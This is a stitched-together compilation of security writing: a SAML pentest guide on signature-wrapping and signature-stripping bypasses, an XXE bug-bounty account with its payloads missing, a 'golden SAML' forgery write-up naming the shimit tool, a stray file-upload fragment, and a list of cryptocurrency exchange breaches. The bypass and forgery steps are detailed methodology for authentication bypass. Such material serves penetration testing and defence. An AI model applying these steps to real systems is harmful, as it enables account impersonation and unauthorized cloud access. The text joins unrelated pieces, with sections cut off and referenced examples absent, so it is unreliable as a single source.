We’ve recently noticed a trend with a lot of New Zealand sites wanting to implement Single Sign-On (SSO) to combat the proliferation of passwords, including many government services. The most prevalent standard for doing this, providing interoperability between many vendors’ frameworks and multiple languages, is SAML 2.0. The usual mechanism for this passes the SAML response certifying the user’s identity through the web browser, using a signature to prevent tampering. Unfortunately, many SAML consumers don’t validate responses properly, allowing attacks up to and including full authentication bypass.
SAML 2.0 SSO
When signing in to a site with SAML 2.0, there are three parties involved – the Service Provider (‘SP’, the web application we want to access), the Principal (the user logging in) and the Identity Provider (‘IdP’, the authority). We want to accomplish the aim of getting the Identity Provider to tell the Service Provider, in a trustworthy way, who the Principal is.
We do this by having the Service Provider redirect our user to the Identity Provider with a SAML request. Once the Identity Provider is satisfied as to the user’s identity, they send them back to the Service Provider with a SAML response. There are three major ways of sending a message for web SSO, which the standard refers to as “bindings”:
- HTTP Redirect Binding. We include the SAML message directly in a URL.
- HTTP POST Binding. We include the SAML message in the body of a POST request.
- HTTP Artifact Binding. We send a random token, which acts as an identifier to retrieve the document via a back channel.
The first two of these can have some serious implementation issues.
Identifying SAML Responses
As described previously, SAML responses are generally passed either in the URL like this:
or in the body of a POST request like this:
Both of these forms can be manipulated by an attacking user as it passes through their browser. If, on the other hand, you see a SAML Artifact like this:
then there’s probably not much you can do with it as an attacker. These tokens are resolved into the original messages and then retrieved via a back-channel, so unless you have access to the target’s private network (and likely an SSL/TLS implementation bug while you’re at it), these are pretty useless to an attacker.
Protecting Messages in Transit
The issue here is that in both the HTTP Redirect and HTTP POST bindings, the document from the IdP validating the user’s identity is passed through that user’s browser, and hence may be tampered with in transit. The HTTP Artifact Binding is immune to this particular issue.
If these messages lack any protections, an attacker could simply modify the response to, for example, claim to be somebody else. If I log in to the IdP as “Tim” then I could simply alter the response document to claim to be “Emmanuel” instead. In fact, I could just entirely forge the response, become Emmanuel, and impersonate him.
Of course, the authors of the standard aren’t lax enough to let that slip past them – they’ve tried very hard to fix this problem. The solution in the standard is to attach an XML Signature to each message, protecting that message against tampering.
The XML Signature Standard
The XML Signature standard is an immensely complicated beast, designed by a working group involving all the big names, and intended to be a one-size-fits-all solution to building tamper-resistant XML documents. Unfortunately, as is often the case, one-size-fits-all becomes the-only-size-fits-nobody.
In a normal application of digital signatures, we take a document to be signed, run it through a cryptographic hash function, and then apply a digital signature algorithm to the hash. If the document received is exactly identical, the signature will validate, whereas if even a single bit changes, the signature becomes invalid and the document is rejected.
Unfortunately, XML Signatures have one killer feature – the standard allows us to sign part of the document instead of the whole document, and embed the signature within the same document it’s supposed to be validating – so called inline signatures. The signatures do this by containing a “Reference” to the part of the document they sign, usually by referring to the “ID” attribute of an XML element, but in theory allowing anything in the XPath standard to be used as an expression. I can, in theory, write a signature anywhere within a document that refers to the “third to last <foo> element”, or equally vague expressions.
When validating an XML signature it’s not enough to ask the question “is this a valid signature from this signer?”. We also have to ask “is this signature present, referring to the right part of the document, applying all the right canonicalizations, from the expected signer AND valid?”. All too often, at least one of these checks is not implemented.
Getting Started with SAML Raider
While all attacks described here can be carried out without many tools, SAML Raider1, a Burp proxy plugin, is a useful tool for testing the common cases.
As described above, signatures can appear in various places within the SAML message and cover various parts of the message. By keeping the content of the message but adding new parts and modifying the structure of the remaining parts, we can craft messages that are still technically signed correctly, but may be interpreted by SAML libraries as having crucial parts signed when they are not.
Whenever the Service Provider is supposed to check something, there’s an opportunity for them to fail to do so or do so incorrectly, giving us an opportunity to bypass the signature. Enable Burp’s interception, capture the SAML request, and try these transformations. Each one should be done against a fresh, valid log-in attempt, as there is usually a nonce preventing us from replaying the same request repeatedly.
For repeated attempts, you may benefit from intercepting a single endpoint only in Burp using interception options like this:
Is a Signature Required?
The SAML standard requires that all messages passed through insecure channels, such as the user’s browser, be signed. However, messages that pass through secure channels, such as an SSL/TLS back channel, do not have to be. As a result of this, we’ve seen SAML consumers that validate any signature present, however silently skip validation if the signature is removed. The software is essentially presuming that we’ve already checked that a message coming from an insecure channel is signed, when this isn’t the case.
The impact of this is the ability to simply remove signatures, and tamper with the response as if they weren’t there. SAML raider can test this one pretty easily:
Is the Signature Validated?
Validating XML signatures is extremely complicated, as the standard expects a series of transformation and canonicalization steps to be applied first (e.g. to ignore the amount of white space). The difficulty of this makes it extremely hard to validate signatures without a fully featured XML Signature library behind you. The impacts of this are:
- Developers don’t generally understand the internals of signature validation.
- Intermediate tools, such as web application firewalls, have no idea whether signatures are valid or not.
- Libraries may have configurable options, such as lists of permitted canonicalization methods, which are meaningless to the developer.
The difficulty of implementing this standard, and the somewhat arcane nature of it, leads to the issues we will now look at.
First, testing whether the signature is validated at all is simple – change something in the supposedly signed content and see if it breaks.
Is the Signature From The Right Signer?
Another stumbling block is whether or not the receiver checks the identity of the signer. We haven’t seen this one done wrong, but SAML Raider will make this fairly easy to test.
Copy the certificate to SAML Raider’s certificate store:
Save and self-sign the certificate, so we have a self-signed copy of the same certificate:
Now we can re-sign the original request with our new certificate, either by signing the whole message or the assertion:
You could identify which of those two options is normally used by your recipient, or just try each of them.
Is the Correct Part of the Response Signed?
How XSW Attacks Work
The SAML standard allows signatures to appear in two places only:
- A signature within a
<Response>tag, signing the Response tag and its descendants.
- A signature within an
<Assertion>tag, signing the Assertion tag and its descendants.
The SAML standard is very specific about where signatures are allowed to be, and what they are allowed to refer to.
However, nobody implements XML signatures in all their gory complexity for use in SAML alone. The standard is generic, and so are the implementations and software libraries built for it. As a result, the separation of responsibilities looks like this:
- The XML Signature library validates according to the XML Signature standard, which allows anything to be signed from anywhere.
- The SAML library expects the XML Signature library to tell it whether or not the response is valid.
Somewhere in the middle of these two components, the rules about what we have to sign are often lost. As a result, we can often have our signature refer to a different part of the document, and still appear valid to the recipient.
By copying the signed parts of the document, and ensuring the signatures point to the copies, we can separate the part of the document that the XML Signature library checks from the part of the document that the SAML library consumes.
SAML Raider will automate the most common attacks of this form for you:
Try selecting each of those options from the drop-down, clicking “Apply XSW” and sending the request on. If this doesn’t cause an error, try doing it again and changing the username or other user identifier in each place it appears in the SAML XML.
Limitations of SAML Raider
While SAML Raider will test the common cases, there are a few attacks that require a deeper understanding:
- Producing a response that will validate against an XML schema (requires hiding the shadow copy inside an element that may contain
- Bypassing validation when both the Response, and Assertions within it are signed and checked.
- Bypassing XML signatures in non-SAML contexts, for example SOAP endpoints using WS-Security extensions.
If SAML Raider’s out-of-the-box options don’t work, you may want to try a manual approach:
- Decode the Base64-encoded content to access the SAML Response XML.
- Check that the signature’s
<Reference>tag contains the ID of a signed element.
- Copy the signed content somewhere else in the document (often the end of the
<Response>is OK, if XML Schema validation is in play try finding somewhere to copy it that doesn’t break the schema.)
- Remove the XML signature from the copy, leaving it in the original. This is necessary as the XML encapsulated signature standard removes the signature that is being validated. In the original document, this was the contained signature, so we have to cut it out from the copy.
- Change the ID of the original signed element to something different (e.g. change a letter).
- Change the content of the original assertion.
- Re-encode as Base64, put in to the request and forward on.
If the signature validation points to the copy, it will ignore your changes. With practice, you can complete this process pretty quickly if strict time limits on requests are in play.
SAML Pentest Checklist
- Does the SAML response pass through the web browser?
- Is it signed? If not, try changing the content.
- Is it accepted if we remove the signatures?
- Is it accepted if we re-sign it with a different certificate?
- Do any of the eight transforms baked in to SAML Raider produce a result that is accepted?
- If you change such a response, is the modified response accepted?
- Might one of SAML Raider’s limitations noted above apply? If so, you may need to try a manual approach.
Findings vulnerabilities like XXE in bug bounty programs are awesome. I have found one XXE bug on private bug bounty program by converting the JSON request to XML request. It was very awesome so though to share with you all.
After fuzzing with the request and responses, I was encountered with the API request which was sending the request in form of JSON as shown below:-
For a valid request, the response was 204 No-Content
I am much comfortable with BurpSuite and downloaded the extension named “Content Type Converter“. This extension helps you to modify the JSON request to XML, XML request to JSON and normal form request to JSON in order to play with request and responses. (Even there are lots of websites out there for this activity but using extension is much effective and comfortable).
So, I have modified the JSON request to XML and checked the response as mentioned below:-
Response was 204 No Content which was unexpected for me. Same response code for JSON and XML request. (I was very happy at that time)
Obviously, my next step was to add XXE payload and check the response on my attacker machine (I have hosted Kali on Amazon).
Request with XXE payload
Response on my Attacker machine:
Now, we can fetch internal server files with HTTP or FTP protocol.
Stay tuned for further blog posts.
In this blog post, we introduce a new attack vector discovered by CyberArk Labs and dubbed “golden SAML.” The vector enables an attacker to create a golden SAML, which is basically a forged SAML “authentication object,” and authenticate across every service that uses SAML 2.0 protocol as an SSO mechanism.
In a golden SAML attack, attackers can gain access to any application that supports SAML authentication (e.g. Azure, AWS, vSphere, etc.) with any privileges they desire and be any user on the targeted application (even one that is non-existent in the application in some cases).
We are releasing a new tool that implements this attack – shimit.
In a time when more and more enterprise infrastructure is ported to the cloud, the Active Directory (AD) is no longer the highest authority for authenticating and authorizing users. AD can now be part of something bigger – a federation.
A federation enables trust between different environments otherwise not related, like Microsoft AD, Azure, AWS and many others. This trust allows a user in an AD, for example, to be able to enjoy SSO benefits to all the trusted environments in such federation. Talking about a federation, an attacker will no longer suffice in dominating the domain controller of his victim.
The golden SAML name may remind you of another notorious attack known as golden ticket, which was introduced by Benjamin Delpy who is known for his famous attack tool called Mimikatz. The name resemblance is intended, since the attack nature is rather similar. Golden SAML introduces to a federation the advantages that golden ticket offers in a Kerberos environment – from gaining any type of access to stealthily maintaining persistency.
For those of you who aren’t familiar with the SAML 2.0 protocol, we’ll take a minute to explain how it works.
The SAML protocol, or Security Assertion Markup Language, is an open standard for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. Beyond what its name suggests, SAML is each of the following:
- An XML-based markup language (for assertions, etc.)
- A set of XML-based protocol messages
- A set of protocol message bindings
- A set of profiles (utilizing all of the above)
The single most important use case that SAML addresses is web browser single sign-on (SSO). [Wikipedia]
Let’s take a look at figure 1 in order to understand how this protocol works.
Figure 1- SAML Authentication
- First the user tries to access an application (also known as the SP i.e. Service Provider), that might be an AWS console, vSphere web client, etc. Depending on the implementation, the client may go directly to the IdP first, and skip the first step in this diagram.
- The application then detects the IdP (i.e. Identity Provider, could be AD FS, Okta, etc.) to authenticate the user, generates a SAML AuthnRequest and redirects the client to the IdP.
- The IdP authenticates the user, creates a SAMLResponse and posts it to the SP via the user.
- SP checks the SAMLResponse and logs the user in. The SP must have a trust relationship with the IdP. The user can now use the service.
SAML Response Structure
Talking about a golden SAML attack, the part that interests us the most is #3, since this is the part we are going to replicate as an attacker performing this kind of attack. To be able to perform this correctly, let’s have a look at the request that is sent in this part – SAMLResponse. The SAMLResponse object is what the IdP sends to the SP, and this is actually the data that makes the SP identify and authenticate the user (similar to a TGT generated by a KDC in Kerberos). The general structure of a SAMLResponse in SAML 2.0 is as follows (written in purple are all the dynamic parameters of the structure):
Depending on the specific IdP implementation, the response assertion may be either signed or encrypted by the private key of the IdP. This way, the SP can verify that the SAMLResponse was indeed created by the trusted IdP.
Similar to a golden ticket attack, if we have the key that signs the object which holds the user’s identity and permissions (KRBTGT for golden ticket and token-signing private key for golden SAML), we can then forge such an “authentication object” (TGT or SAMLResponse) and impersonate any user to gain unauthorized access to the SP. Roger Grimes defined a golden ticket attack back in 2014 not as a Kerberos tickets forging attack, but as a Kerberos Key Distribution Center (KDC) forging attack. Likewise, a golden SAML attack can also be defined as an IdP forging attack.
In this attack, an attacker can control every aspect of the SAMLResponse object (e.g. username, permission set, validity period and more). In addition, golden SAMLs have the following advantages:
- They can be generated from practically anywhere. You don’t need to be a part of a domain, federation of any other environment you’re dealing with
- They are effective even when 2FA is enabled
- The token-signing private key is not renewed automatically
- Changing a user’s password won’t affect the generated SAML
AWS + AD FS + Golden SAML = ♥ (case study)
Let’s say you are an attacker. You have compromised your target’s domain, and you are now trying to figure out how to continue your hunt for the final goal. What’s next? One option that is now available for you is using a golden SAML to further compromise assets of your target.
Active Directory Federation Services (AD FS) is a Microsoft standards-based domain service that allows the secure sharing of identity information between trusted business partners (federation). It is basically a service in a domain that provides domain user identities to other service providers within a federation.
Assuming AWS trusts the domain which you’ve compromised (in a federation), you can then take advantage of this attack and practically gain any permissions in the cloud environment. To perform this attack, you’ll need the private key that signs the SAML objects (similarly to the need for the KRBTGT in a golden ticket). For this private key, you don’t need a domain admin access, you’ll only need the AD FS user account.
Here’s a list of the requirements for performing a golden SAML attack:
- Token-signing private key
- IdP public certificate
- IdP name
- Role name (role to assume)
- Role session name in AWS
- Amazon account ID
The mandatory requirements are highlighted in purple. For the other non-mandatory fields, you can enter whatever you like.
How do you get these requirements? For the private key you’ll need access to the AD FS account, and from its personal store you’ll need to export the private key (export can be done with tools like mimikatz). For the other requirements you can import the powershell snapin Microsoft.Adfs.Powershell and use it as follows (you have to be running as the ADFS user):
ADFS Public Certificate
Once we have what we need, we can jump straight into the attack. First, let’s check if we have any valid AWS credentials on our machine.
Unsurprisingly, we have no credentials, but that’s about to change. Now, let’s use shimit to generate and sign a SAMLResponse.
The operation of the tool is as follows:
Figure 2– Golden SAML with shimit.py
- Generate an assertion matching the parameters provided by the user. In this example, we provided the username, Amazon account ID and the desired roles (the first one will be assumed).
- Sign the assertion with the private key file, also specified by the user.
- Open a connection to the SP, then calling a specific AWS API AssumeRoleWithSAML.
- Get an access key and a session token from AWS STS (the service that supplies temporary credentials for federated users).
- Apply this session to the command line environment (using aws-cli environment variables) for the user to use with AWS cli.
Performing a golden SAML attack in this environment has a limitation. Even though we can generate a SAMLResponse that will be valid for any time period we choose (using the –SamlValidity flag), AWS specifically checks whether the response was generated more than five minutes ago, and if so, it won’t authenticate the user. This check is performed in the server on top of a normal test that verifies that the response is not expired.
This attack doesn’t rely on a vulnerability in SAML 2.0. It’s not a vulnerability in AWS/ADFS, nor in any other service or identity provider.
Golden ticket is not treated as a vulnerability because an attacker has to have domain admin access in order to perform it. That’s why it’s not being addressed by the appropriate vendors. The fact of the matter is, attackers are still able to gain this type of access (domain admin), and they are still using golden tickets to maintain stealthily persistent for even years in their target’s domain.
Golden SAML is rather similar. It’s not a vulnerability per se, but it gives attackers the ability to gain unauthorized access to any service in a federation (assuming it uses SAML, of course) with any privileges and to stay persistent in this environment in a stealthy manner.
As for the defenders, we know that if this attack is performed correctly, it will be extremely difficult to detect in your network. Moreover, according to the ‘assume breach’ paradigm, attackers will probably target the most valuable assets in the organization (DC, AD FS or any other IdP). That’s why we recommend better monitoring and managing access for the AD FS account (for the environment mentioned here), and if possible, auto-rollover the signing private key periodically, making it difficult for the attackers.
In addition, implementing an endpoint security solution, focused around privilege management, like CyberArk’s Endpoint Privilege Manager, will be extremely beneficial in blocking attackers from getting their hands on important assets like the token-signing certificate in the first place.
Often, when you write the code, which is responsible for file uploading, you check the extensions of downloaded file with using “whitelist” (when you can upload only files with certain extensions) or “blacklist” (when you can upload any files which are not included in the list).
Bancor posted early details of an investigation into a security breach regarding a smart contract. A wallet used to upgrade smart contracts was used to steal somewhere in the range of $23M. Some amount of this was mitigated by protocol level features that allow the freezing of BNT tokens.
A wallet used to upgrade some smart contracts was compromised. This compromised wallet was then used to withdraw ETH from the BNT smart contract in the amount of 24,984 ETH ($12.5M). The same wallet also stole: 229,356,645 NPXS (~$1M) 3,200,000 BNT (~$10M)
Note: Charting as “unknown” until the method used to compromise the method is described.
On June 10, there was a system check due to the hacking attempt at dawn. At present, we have confirmed that 70% of the coin rail total coin / token reserves are safely stored
I moved to a cold wallet and it’s being saved. About 80% of coins that have been confirmed to be leaked have been frozen / withdrawn / redeemed or equivalent, in consultation with their co-workers and related exchanges, while the remainder are under investigation with investigators, related exchanges and coin developers.
Interestingly, South Korean Law Enforcement worked pretty quickly to help contain the issue with maintainers of the coins that had theft.
This is Bithumb’s second appearance in the graveyard. 35 billion Korean won (around $31 million) is estimated to have been stolen, and data about root cause is sparse.
Taylor is described as a “smart cryptocurrency trading assistant” which allows people to day trade cryptocurrency.
Today we arrived at the office and found out that we’ve been hacked and all of our funds have been stolen. Not only the balance in ETH (2,578.98 ETH), but also the TAY tokens from the Team and Bounty pools.
Lots of write ups from their executives shed light on their incident (1, 2, 3). The root cause appears to be a 1Password file theft. It is not clear how the file was accessed, how a hacker had positioning to view it, or whether it contained cryptographic secrets or infrastructure secrets.
Somehow the hacker got access to one of our devices and took control of one of our 1Password files.
The following is also interesting:
Although we are all aware of the good practices, we confess that we may have neglected some very important details — we know that the devil is in the details.
As far as we know, the hacker is same person/group that supposedly hacked CypheriumChain (more than 17,000 ETH were stolen).
The hacker collected the amount from multiple sources in a single wallet, then transferred it to a bigger one.
What we can say is that it was not a smart contract exploit.
A failed cold storage restoration exercise seems to have exposed private keys intended for offline storage (effectively making them online). However, the CEO has expressed an insider’s involvement. Police found private keys exposed online for more than 12 hours.
Our system itself has never been compromised or hacked, and the current issue points towards losses caused during an exercise to extract BTG to distribute to our customers. Our CSO, Dr. Amitabh Saxena, was extracting BTG and he claims that funds have been lost in the process during the extraction of the private keys.
This is one of the harder breaches to decipher, as there are a lot of conspiracy articles and accusations by all parties involved. Underlying the Bitgrail breach seems to be some kind of application error of some sort, as opposed to a fully hijacked wallet, but this doesn’t have a lot of certainty involved. The Nano core team (the currency involved) announced suspicion of the exchange and their claims.
We now have sufficient reason to believe that Firano has been misleading the Nano Core Team and the community regarding the solvency of the BitGrail exchange for a significant period of time.
However, the Bitgrail accusations have pointed towards a thief, and blockchain viewing software developed by Nano.
BitGrail Srl once again confirms that it was the victim of a theft, which took advantage of malfunctions of the software made available by the NANO team (rai_node and official block explorer) and, therefore, also for these reasons and according to the law, is not absolutely responsible, for any reason, of the incident.
Coincheck is a Japanese exchange that works with multiple blockchains, including NEM. Around January 26, 2018, XEM valued at approximately $400m USD were stolen. Initial cause was unclear to Coincheck according to their statements.
After hours of speculation Friday night, Coincheck Inc. said the coins were sent “illicitly” outside the venue. Co-founder Yusuke Otsuka said the company didn’t know how the 500 million tokens went missing, and the firm is working to ensure the safety of all client assets. Coincheck said earlier it had suspended all withdrawals, halted trading in all tokens except Bitcoin, and stopped deposits into NEM coins.
According to the exchange’s representatives, the hackers have managed to steal the private key for the hot wallet where NEM coins were stored, enabling them to drain the funds.
BlackWallet is a wallet used to send and receive Lumens (XLM) on the Stellar network. The creator of BlackWallet announced on Reddit an infrastructure compromise resulting in in a hacked website that attacked users who entered private keys into it. It should be noted that BlackWallet was not in possession of user private keys, but it was a more of a wallet client that could be used to view a wallet.
BlackWallet appears to have existed since August 2017, with a DNS hijack on January 13 pointing traffic towards Cloudflare, and a malicious browser based wallet. BlackWallet only existed for five months before being victimized.
I am the creator of Blackwallet. Blackwallet was compromised today, after someone accessed my hosting provider account. He then changed the dns settings to those of its fraudulent website (which was a copy of blackwallet).
Youbit was hacked on December 19th at 4:35 am. They had previously been breached earlier in the year, with South Korean officials indicating North Korean involvement. Their hot wallet containing 17% of their assets, was breached and stolen, indicating that cold storage was useful. Assuming server breach of some kind.
After the accident in April, we have done our best to improve the security, recruitment and system maintenance, and
have managed to lower the hot wallet rate.
Then, at 4:35 am, we lost our coin purse due to our hacking.
- The coin loss at 4:35 am is about 17% of total assets. The other coins were kept in the cold wallet and there were no additional > losses.
- Loss ratio is low compared to last April, but the management of Yaffian Co. , Ltd. is going to proceed with the process of stopping the transaction, stopping deposit and withdrawal, and bankruptcy on December 19, 2013 ,
- Accordingly, all coins and cash withdrawals and withdrawals will be suspended at 12:00 pm on December 19, 2017.
- Due to bankruptcy, the settlement of cash and coins will be carried out in accordance with all bankruptcy procedures.
- However, in order to minimize the damage to our members, we will arrange for the withdrawal of approximately 75% of the balance at > 4:00 am on December 19, The rest of the unpaid portion will be paid after the final settlement is completed.
- We will do our best to minimize the loss of our members by 17% , through various methods such as cyber comprehensive insurance (3 > billion) and selling the operating rights of the company.
- After the announcement date, your assets will be adjusted to 75% at 4:00 pm on December 19 , 2017. Cash and coins deposited after 4:00 pm will be 100% refunded.
Nicehash was a cryptocurrency mining service and marketplace, allowing users to buy and sell their own mining power. While not necessarily a mining pool of its own, it still maintained a wallet for customer funds. Nicehash appears to have shuttered their website with a notice saying “a security breach involving NiceHash website” and “our payment system was compromised and the contents of the NiceHash Bitcoin wallet have been stolen”.
A Facebook livestream has further notes on the issue. This is hard to archive so I will transcribe useful points. Overall, this was lateral movement from a remote IP address, gaining access to a VPN, possibly through an employee computer, and moving laterally into production systems. This appeared to all have happened within a couple of hours, when the attacker decided to work actively.
- “We became a target and someone really wanted to bring us down.”
- “We are cooperating with local and international law enforcement”.
- ~4700 BTC stolen on early morning 12-06-2017
- Can’t discuss everything due to investigation.
- Hacker(s) were able to infiltrate our internal systems through a compromised company computer.
- Unknown how company computer was compromised.
- VPN had visibility into abusive behavior, IP address was outside of European Union.
- “Made a crucial VPN login using an engineer’s credentials”
- After VPN login, learned and simulated the workings of our payment system.
- Managed to steal funds from accounts (indicates that the active attack timeline was only a couple hours)
Tether lost $31 million in “tokens”. Tether tokens allow you to “store, send and receive digital tokens pegged to dollars, euros, and yen person-to-person, globally”. Based on wording in Tether blog posts, a “treasury wallet” was drained by an external attacker. This infers that some sort of key material, or signature generating process was misused, so I estimate this ultimately required the breach of a high risk server. This estimation is low confidence and could change with new information, for instance, if the treasury wallet was cold, or held on a compromised endpoint by an employee. Remote access requires some aspect of wallet “warmth” which makes me believe it was online on a server. The Tether team claims high confidence in identifying their root cause so this is not an “unknown” root cause.
On Sunday, November 19th, $30,950,010.00 in Tether tokens were stolen from our treasury wallet through malicious action by an external attacker. While we are in the process of co-ordinating and co-operating with law enforcement on this matter, we are satisfied that we have found the cause of the breach of Tether’s systems. We are taking measures to recover the Tethers and are migrating the platform to a new infrastructure. More information about our initial response to this breach is here.
CoinDash appears to be victimized by a hacked website, which a supposed adversary swapped out a funding address with a malicious address immediately after a token sale was launched.
Contributors that sent ETH to the fraudulent Ethereum address, which was maliciously placed on our website, and sent ETH to the CoinDash.io official address will receive their CDT tokens accordingly. Transactions sent to any fraudulent address after our website was shut down will not be compensated.
It is unfortunate for us to announce that we have suffered a hacking attack during our Token Sale event. During the attack $7 Million were stolen by a currently unknown perpetrator. The CoinDash Token Sale secured $6.4 Million from our early contributors and whitelist participants and we are grateful for your support and contribution.
(Will update post when more thorough information is available. For now, view bravenewcoin.com
“The employee PC, not the head office server, was hacked. Personal information such as mobile phone and email address of some users were leaked. However, some customers were found to have been stolen from because of the disposable password used in electronic financial transactions.”
Due to a programming error in the implementation of Zerocoin, an attacker was able to exploit a single proof to generate multiple spends they could send to an exchange, in which the attackers then sold and withdrew funds.
Significant documentation on the breach is available.
From what we can see, the attacker (or attackers) is very sophisticated and from our investigations, he (or she) did many things to camouflage his tracks through the generation of lots of exchange accounts and carefully spread out deposits and withdrawals over several weeks. We estimate the attacker has created about 370,000 Zcoins which has been almost completely sold except for about 20,000+ Zcoin and absorbed on the market with a profit of around 410 BTC. In other words, the damage has already been mostly absorbed by the markets.
Most information related to this breach is in Polish. Bitcurex warned users not to use previous deposit addresses, which indicates a breach. No information on a root cause is easily available.
Follow up investigation of the blockchain is mostly done by Polish bitcoin press, which estimates a 2300BTC loss.
This is Bitfinex’s second appearance in the graveyard.
All below information is inferred or directly from reddit comments of Bitfinex employees. Employees repeatedly offer insight in comments that an internal breach allowed an attacker to interact with their BitGo implementation, and that BitGo’s security was not compromised.
Bitfinex suggests in these comments that several withdrawal limits existed per user and system wide, and employees are unsure how they were bypassed.
BitGo is a multisignature solution that heavily protects loss from a single key material breach. This approach greatly mitigates many of the risks associated with BTC, but still has a burden of securely storing API secrets or taking advantage of mitigations available to them in API implementation.
At the end of the day, an application interacts with an API that signs transactions.
The victims have strongly cleared BitGo of fault, it appears Bitfinex may not have taken advantage of (or incorrectly used) the security controls available to them through the BitGo API.
Employees have also stated that per user, HD wallets backed by the BitGo API were used in lieu of any truly offline cold storage solution. This implementation suggests that authentication to BitGo’s API was “warm” or “hot” leaving API and signing keys to reside on servers that could be remotely accessed by an attacker. It was also suggested that every Bitfinex BTC holder used this approach, meaning vulnerability carried 100% risk of bitcoin loss across the board.
It’s not currently suggested how servers were accessed for an attacker to position themselves into an attack like this, but will update if that becomes available.
We are investigating the breach to determine what happened, but we know that some of our users have had their bitcoins stolen. We are undertaking a review to determine which users have been affected by the breach. While we conduct this initial investigation and secure our environment, bitfinex.com will be taken down and the maintenance page will be left up.
While technically an application vulnerability, this breach is interesting in that the vulnerability was within an Ethereum Contract. This has made the ability to patch or restore funds a very dramatic and unique situation involving miner consensus and the philosophy of ethereum’s purpose as a technology. Hard and Soft forks were considered with contention to reverse the attack.
An attack has been found and exploited in the DAO, and the attacker is currently in the process of draining the ether contained in the DAO into a child DAO. The attack is a recursive calling vulnerability, where an attacker called the “split” function, and then calls the split function recursively inside of the split, thereby collecting ether many times over in a single transaction.
This breach is unique in that it attacked Cold Storage.
It is just as important to protect the deposits into cold storage as much as the cold storage itself. If cold storage deposit is modified, it’s as if you don’t have cold storage at all.
We have previously communicated the fact that most clients’ crypto-asset funds are stored in multi-signature cold wallets. However, the malicious external party involved in this breach, managed to alter our system so that ETH and BTC deposit transfers by-passed the multi-sig cold storage and went directly to the hot wallet during the breach period. This means that losses of ETH funds exceed the 5% limit that we imposed on our hot wallets.
Not much data available, but in a transition to shut down their wallet product, they somehow leaked a password database.
While we were turning off servers, disabling firewalls and cleaning up backup systems today, we may have leaked a copy of our database. Although passwords into Coinkite.com are not useful anymore, you can rest assured that passwords were salted and SHA256 hashed with 131,072 rounds. If you used the same password on other sites, as a precaution, you may want to consider changing those other accounts. It’s possible you will see spam to your related email addresses.
Application vulnerability due to a lack of input sanitation, type unknown, though it does reference a “database call” which implies some form of database injection like SQLi.
Strangely, they claim that no coins were lost, though CoinWallet shut down anyway.
It is with great regret that we announce the closure of CoinWallet.co.
Our decision to close is based on several factors. Primarily, on the 6th of April we suffered a data breach.
Despite our best efforts there was a small error in a part of our code that should have checked and sanitized user input on a recently added function. Checks were in place but the check was then subsequently not used to block the database call.
Our backup security system kicked in as it was designed to and no coins were lost. We have since patched the vulnerability but are still trying to determine the extent of the breach. However it would be advised to change passwords on any other crypto related websites where you use the same password and username as coinwallet.co. We used encrypted and salted passwords but given enough time these should be assumed compromised.
Effective immediately, we have reset all passwords, deleted all API keys, and halted the twitter Tip Bot.
This incident prompted us to reassess the viability of running coinwallet.co and it was decided it is just not viable taking into consideration the risk, costs and time involved.
Not much data available, other than that it has completely shut down after a suspected breach.
This issue is currently under investigation and it is our intention to have the balance of your account settled as soon as possible. We sincerely apologize for this unfortunate inconvenience and will keep you posted on the progress of this issue. In the meantime, we have halted deposits, withdrawals and trading activity until this matter has been resolved.
Not much detail provided, and appears damage was fairly limited for unknown reasons.
On Monday, March 14, 2016, our server fell victim to an attack that gave the attacker unauthorized administrative access. The breach was immediately noticed, and the server was shutdown to prevent any further damage. We are still performing a formal investigation to determine the attack vector, and specifically what information was obtained from the server. Due to additional security mechanisms in place, no funds were taken, and all ID’s (driver’s licenses, passports, etc.) and emails remain secured. Sellers were emailed withdrawal instructions Tuesday evening. All outstanding orders and withdrawals have been processed. Only 3% of all funds remain unclaimed.
Extremely detailed post-mortem’s available from this breach, involving an external hacker collaborating with an insider threat.
On March 14th, ShapeShift had 315 Bitcoin stolen from its hot wallet. It was quickly discovered that an employee at that time had committed the theft. It was reported to relevant authorities, and a civil suit was opened against the individual. As we had quickly figured out who it was, and how to resolve it internally, we were able to keep the site running uninterrupted. We planned to get the stolen property returned, and thought that was the end of it.
Maliciously placed Application vulnerability after a dependency (Lucky7Coin) was backdoored by a malicious developer, and abused for months to pull off an attack.
After a period of time of investigation it was found that the developer of Lucky7Coin had placed an IRC backdoor into the code of wallet, which allowed it to act as a sort of a Trojan, or command and control unit. This Trojan had likely been there for months before it was able to collect enough information to perform the attack.
Very little information, other than that wallets were compromised.
BIPS has been a target of a coordinated attack and subsequent security breached. Several consumer wallets have been compromised and BIPS will be contacting the affected users.
Most of what was recoverable from our servers and backups has now been restored and we are currently working on retrieving more information to get a better understanding of what exactly happened, and most of all what can be done to track down who did it.
The attacker spearphished the CFO (with what looks to be a compromised email / server of someone else, this is unclear) and successfully acquired his credentials with a phishing page.
These credentials were then used to communicate with the CEO and request multiple large transfers to the amount of $1.8 Million USD. A customer pointed out the fraud.
Below is the root cause as pointed out by court documents.
On or about December 11, 2014, Bryan Krohn, the CFO of Bitpay, received an email from someone purporting to be David Bailey of yBitcoin (a digital currency publication) requesting Mr. Krohn comment on a bitcoin industry document.
Unbeknownst to Mr. Krohn, or anyone at Bitpay, Mr. Bailey’s computer had been illegally entered (i.e. “hacked”).
The phony email sent by the person who hacked Mr. Bailey’s computer, directed Mr. Krohn to a website controlled by the hacker wherein Mr. Krohn provided the credentials for his Bitpay corporate email account.
After capturing Mr. Krohn’s Bitpay credentials, the hacker used that information to hack into Mr. Krohn’s Bitpay email account to fraudulently cause a transfer of bitcoin.
The hacker illegally hacked Mr. Krohn’s computer so he could use his or her computer to send false authorizations to Bitpay on December 11 and 12, 2014.
It is this hacking which fraudulently caused the transfers of bitcoin and therefore the loss to Bitpay of bitcoin valued at $1,850,000 (the “Loss”).
Bitpay cannot recapture the lost bitcoin.
An attacker defaced the cloudminr.io website with a “database for sale” message containing usernames and passwords.
According to various reports, the site was hacked on or about July 7th, with the main page of the service being amended over the weekend to offer the sale of customer login and personal information, along with a CSV (comma separated values) taste-test of the details of 1,000 customers’ personal details by the hackers to demonstrate that they were the “real deal.”
If a leaked incident report is to be believed, a VBA script embedded in a Word document was delivered via social engineering tactics over Skype to several employees. This malware was detonated on a system administrator’s machine who also had access to wallet.dat files and wallet passwords. 18,866 BTC lost as deposits were stolen over the course of several days.
